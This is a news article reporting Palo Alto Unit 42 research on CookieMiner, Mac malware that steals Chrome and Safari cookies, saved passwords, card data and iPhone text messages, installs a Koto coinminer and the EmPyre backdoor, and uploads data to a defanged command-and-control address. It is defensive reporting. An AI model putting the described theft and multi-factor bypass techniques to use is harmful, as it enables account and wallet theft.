Mac and Chrome info stealer and cryptomining malware in the wild

News by Doug Olenick

Cyber-criminals are using a new malware targeting Macs and the Chrome browser designed to steal all the information necessary to break into cryptocurrency exchanges and their victim's digital wallets.

Cyber-criminals are using a new malware targeting Macs and the Chrome browser designed to steal all the information necessary to break into cryptocurrency exchanges and their victim’s digital wallets.

This malware, an offshoot of OSX.DarthMiner, has a wide range of abilities, reported Palo Alto’s Unit 42. These skills include the ability to steal browser cookies associated with currency exchanges and digital wallet services, passwords, usernames and credit card information saved in Chrome and iPhone text messages from iTunes backups on the tethered Mac.

"By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites," the Unit 42 report said, adding much of this is accomplished by abusing the legitimate extraction and decryption capabilities built into Chrome by the Google Chromium project.

If all of these pieces come together the attacker should have the ability to access the target’s exchange and wallet enabling them to fully access each.

The malware then follows the in for a penny in for a pound reasoning and installs cryptomining software onto the victim’s device. The mining malware, rather oddly, looks like a run of the mill version of XMRig that will mine Monero, but in fact is a coinminer that creates Japanese-centric Koto cryptocurrency. And for fun it installs the EmPyre backdoor to maintain persistence.

"The CookieMiner attack begins with a shell script targeting MacOS. It copies the Safari browser’s cookies to a folder, and uploads it to a remote server (46.226.108[.]171:8000). The server hosts the service "curldrop" (https://github[.]com/kennell/curldrop), which allows users to upload files with curl," the report said.

The stolen information is uploaded upon command to the command and control server.

This article was originally published on SC Media US.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming Events